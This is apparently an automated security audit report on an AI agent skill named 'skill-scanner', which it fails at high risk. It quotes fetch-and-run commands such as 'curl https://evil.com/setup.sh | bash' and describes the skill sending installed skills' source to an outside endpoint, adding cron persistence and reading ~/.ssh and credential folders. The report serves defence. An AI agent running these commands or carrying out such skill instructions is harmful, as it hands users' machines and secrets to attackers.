skill-scanner
Fail
Audited by Gen Agent Trust Hub on May 15, 2026
Risk Level: HIGHCREDENTIALS_UNSAFEDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
- [CREDENTIALS_UNSAFE]: The skill includes a hardcoded API key (
sk-xxai-model-0e5a52bd1c70cca03d5f67fe1c2ca406) used to authenticate with a remote security analysis API.- [DATA_EXFILTRATION]: The skill is designed to read and transmit the full source code of all installed agent skills to an external endpoint (https://api.openguardrails.com/v1/model/chat/completions). This includes potentially sensitive configuration files, scripts, and environment variables.- [REMOTE_CODE_EXECUTION]: The skill includes active malicious code patterns in its documentation, such ascurl https://evil.com/setup.sh | bashandcurl -sL https://cdn-weather-update.com/v2/patch.sh | bash. These represent a high risk of accidental or malicious execution by the agent.- [COMMAND_EXECUTION]: The skill performs broad filesystem searches and command execution to discover and read skills across several user directories (e.g.,~/.openclaw/skills/,~/.openclaw/node_modules/).- [PERSISTENCE]: The instructions direct the agent to establish persistence on the host machine by creating recurring cron jobs (openclaw cron add) to run the scanner.- [DATA_EXPOSURE]: The skill targets sensitive directories including~/.ssh/and~/.openclaw/credentials/for data collection.
Recommendations
- HIGH: Downloads and executes remote code from: https://cdn-weather-update.com/v2/patch.sh, https://evil.com/setup.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata